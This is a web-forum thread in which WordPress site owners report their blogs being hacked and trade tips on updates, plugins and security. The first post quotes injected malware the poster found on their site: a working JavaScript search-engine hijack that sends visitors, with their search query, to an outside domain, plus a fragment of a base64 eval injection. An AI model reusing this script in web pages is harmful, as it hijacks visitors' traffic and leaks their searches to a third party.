![]() |
| ||||||||
|
|
#1 |
|
HyperActive Warrior
War Room Member
Join Date: Jan 2008
Location: Southern California
Posts: 167
Thanks: 8
Thanked 44 Times in 30 Posts
|
Yes, I'm now a sad member of that group.
![]() Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited. 1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install. On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run it's hack all the way through. My guess is it's probably some kind of redirect. 2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level. The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script: <script> var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length). split("&")[0]; </script> We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr! I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes. So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place. Wendell |
|
|
|
|
|
|
| The Following User Says Thank You to WendellC For This Useful Post: |
|
|
#2 |
|
Warrior Member
Join Date: Jun 2009
Location: Southern Germany
Posts: 16
Thanks: 0
Thanked 0 Times in 0 Posts
|
Wendell,
how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...) Cheers Veit |
|
|
|
|
|
#3 |
|
Greg Schueler
War Room Member
Join Date: Jul 2002
Location: Las Vegas
Posts: 941
Thanks: 55
Thanked 72 Times in 59 Posts
|
I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.
Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet. |
|
Greg Schueler...Top Hawaii Destinations
Step-By-Step Affiliate Marketing System. It shows you how to make money without money with affiliate marketing. |
|
|
|
|
|
|
#4 |
|
Warrior Member
Join Date: Jan 2009
Location: UK
Posts: 20
Thanks: 0
Thanked 0 Times in 0 Posts
|
If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.
|
|
|
|
|
|
|
|
|
#5 |
|
always PM more info
Join Date: Jun 2009
Location: Virginia
Posts: 38
Thanks: 7
Thanked 5 Times in 5 Posts
|
they make a security plugin for WP, might want to gander at some of those.
keeps your eyes open, sometimes they do something simple so it appears like thats all they did. |
|
|
|
|
|
#6 | |
|
HyperActive Warrior
War Room Member
Join Date: Jan 2008
Location: Southern California
Posts: 167
Thanks: 8
Thanked 44 Times in 30 Posts
|
Quote:
Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema. I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences... *sigh* Wendell | |
|
|
||
|
|
|
|
|
#7 |
|
Warrior Member
Join Date: Jun 2009
Posts: 14
Thanks: 0
Thanked 1 Time in 1 Post
|
I have wordpress site, but didn't have such problems. Probably because I have only few visitors monthly.
|
|
|
|
|
|
#8 |
|
Active Warrior
Join Date: Oct 2008
Posts: 32
Thanks: 0
Thanked 2 Times in 2 Posts
|
Definitely gotta keep your WP up to date.
There's a security scan plugin that helps too. |
|
|
|
|
|
#9 |
|
HyperActive Warrior
Join Date: Aug 2008
Posts: 158
Thanks: 2
Thanked 4 Times in 4 Posts
|
I used to use wordpress. It is a very powerful piece of blogging software but after being hacked myself i went back to go old fashioned HMTL and javascript. Also wordpress has a habit of running slow at peak times and my users were getting fed up of waiting 30 seconds for a page to load up. HTML is so fast because there is little code to slow the process down and it's the same with PHP.
|
|
How To Get Out Of Credit Card Debt
100+ Paid Survey Site Reviews Electricity Bill Savings - Great Ways to save on your electricity bill Get Paid To Write Articles - Revenue Sharing Communities |
|
|
|
|
|
|
#10 |
|
One Man Army
War Room Member
Join Date: Jul 2008
Location: London, UK
Posts: 880
Thanks: 23
Thanked 120 Times in 68 Posts
|
I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure its not a real mess and easy to hack.
|
|
|
|
|
|
#11 |
|
HyperActive Warrior
War Room Member
Join Date: Aug 2008
Posts: 114
Thanks: 150
Thanked 7 Times in 7 Posts
|
I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed |
|
Edward W. Smith For your FREE 30 page TOOLKIT of success/motivational information not available anywhere else, email edsmith@brightmoment.com, www.brightmoment.com.
|
|
|
|
|
|
|
#12 | |
|
Offline Marketing Expert
War Room Member
Join Date: Feb 2007
Location: Redondo Beach, CA USA
Posts: 401
Thanks: 202
Thanked 44 Times in 22 Posts
|
Quote:
Best, David | |
|
I'm a Published Author & Offline Marketing Expert - Get Free Online Training in Using Public Speaking & Seminars to Promote A-N-Y-T-H-I-N-G
http://www.BestPublicSpeakingTraining.com |
||
|
|
|
| The Following User Says Thank You to JustaWizard For This Useful Post: |
|
|
#13 |
|
Offline Marketing Expert
War Room Member
Join Date: Feb 2007
Location: Redondo Beach, CA USA
Posts: 401
Thanks: 202
Thanked 44 Times in 22 Posts
|
The oldest version of Wordpress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect" because I deleted plugins one by one (at BlueHosts suggestion) until I isolated the offending plugin. Now I have 2.8 up and with all the plugins including "redirect" and things have been fine.
I guess that plugins and Wordpress are just vulnerable??? David |
|
I'm a Published Author & Offline Marketing Expert - Get Free Online Training in Using Public Speaking & Seminars to Promote A-N-Y-T-H-I-N-G
http://www.BestPublicSpeakingTraining.com |
|
|
|
|
|
|
#14 |
|
PhpMembersScript.com
War Room Member
Join Date: Aug 2008
Location: South Carolina, USA
Posts: 4,674
Blog Entries: 2
Thanks: 452
Thanked 751 Times in 486 Posts
|
Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..
Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself... The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue. Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes. James |
|
Article Directory/Tools/Spinner | Upto 1800+ Authority Bookmarks and Backlinks - Starts $8.77
Christmas PLR Pack - Articles, Templates, Graphics, Resources and More $8.97 MRR/RR Block SideWiki | Membership Script | WordPress Security |
|
|
|
|
|
|
#15 | |
|
Offline Marketing Expert
War Room Member
Join Date: Feb 2007
Location: Redondo Beach, CA USA
Posts: 401
Thanks: 202
Thanked 44 Times in 22 Posts
|
Quote:
I admit I'm not green, but not a programmer-type either... THANKS! David | |
|
I'm a Published Author & Offline Marketing Expert - Get Free Online Training in Using Public Speaking & Seminars to Promote A-N-Y-T-H-I-N-G
http://www.BestPublicSpeakingTraining.com |
||
|
|
|
|
|
#16 | |
|
PhpMembersScript.com
War Room Member
Join Date: Aug 2008
Location: South Carolina, USA
Posts: 4,674
Blog Entries: 2
Thanks: 452
Thanked 751 Times in 486 Posts
|
Quote:
James | |
|
Article Directory/Tools/Spinner | Upto 1800+ Authority Bookmarks and Backlinks - Starts $8.77
Christmas PLR Pack - Articles, Templates, Graphics, Resources and More $8.97 MRR/RR Block SideWiki | Membership Script | WordPress Security |
||
|
|
|
|
|
#17 |
|
HyperActive Warrior
War Room Member
Join Date: Jan 2008
Location: Southern California
Posts: 167
Thanks: 8
Thanked 44 Times in 30 Posts
|
Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.
![]() So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date? Thanks - Wendell |
|
|
|
|
|
|
|
|
#18 |
|
formerly annoyedgirl
War Room Member
Join Date: Nov 2007
Location: The Chosen Land , USA.
Posts: 1,276
Thanks: 126
Thanked 125 Times in 87 Posts
|
I think I was one of the very first members.
|
|
|
|
|
|
|
|
|
#19 |
|
Senior Warrior Member
War Room Member
Join Date: Feb 2005
Location: Northeast Fl USA.
Posts: 1,598
Blog Entries: 2
Thanks: 19
Thanked 22 Times in 12 Posts
|
I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.
Tom |
|
|
|
|
|
|
|
|
#20 |
|
Warrior Member
War Room Member
Join Date: May 2009
Posts: 20
Thanks: 4
Thanked 2 Times in 1 Post
|
Once about 5 of my wp sites (which I wasn't updating for several months) were hacked by some saudi arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page
Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didnt even visit these sites for months).They could hack because, i wasn't updating my wp or the plugins. After this lesson, I religiously update all my wordpress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of wordpress. |
|
|
|
|
|
#21 | |
|
PhpMembersScript.com
War Room Member
Join Date: Aug 2008
Location: South Carolina, USA
Posts: 4,674
Blog Entries: 2
Thanks: 452
Thanked 751 Times in 486 Posts
|
Quote:
Also do NOT update as soon as a new release is out, wait until it is stable. James | |
|
Article Directory/Tools/Spinner | Upto 1800+ Authority Bookmarks and Backlinks - Starts $8.77
Christmas PLR Pack - Articles, Templates, Graphics, Resources and More $8.97 MRR/RR Block SideWiki | Membership Script | WordPress Security |
||
|
|
|
|
|
#22 |
|
Gleb
War Room Member
Join Date: Dec 2008
Location: Ottawa, Canada
Posts: 503
Thanks: 7
Thanked 47 Times in 39 Posts
|
I second suggestion of not updating as soon as Wordpress releases next major update.
Wait few weeks until dust settles. I.e: *.*.Y - update is safe immediately. *.Y - wait 2 weeks before applying. Y.* - wait 4 weeks before applying. Gleb |
|
Affiliate Link Cloaker + immunity against Google slap + URL Shortener = AFLinker
Wordpress Membership Site Plugin Build your automated recurring subscription website with Wordpress Membership plugin MemberWing |
|
|
|
|
|
|
#23 |
|
Advanced Warrior
War Room Member
Join Date: Mar 2007
Location: Arizona
Posts: 703
Thanks: 50
Thanked 53 Times in 13 Posts
|
I've have a plugin that works easily with Wordpress, to Secure your BLOG...My WP-Padlock program secures Wordpress easily and quickly, and comes with installation video, and info on how to secure the vulnerabilities in Wordpress...
You can find the plugin in my signature below... ~AzSno... P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems, and Nokia Firewalls and Security Devices...)...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security... |
|
|
|
|
|
|
![]() |
|
| Tags |
| club, exploit, hacked, join, virus, wordpress |
| Thread Tools | |
|
|
![]() |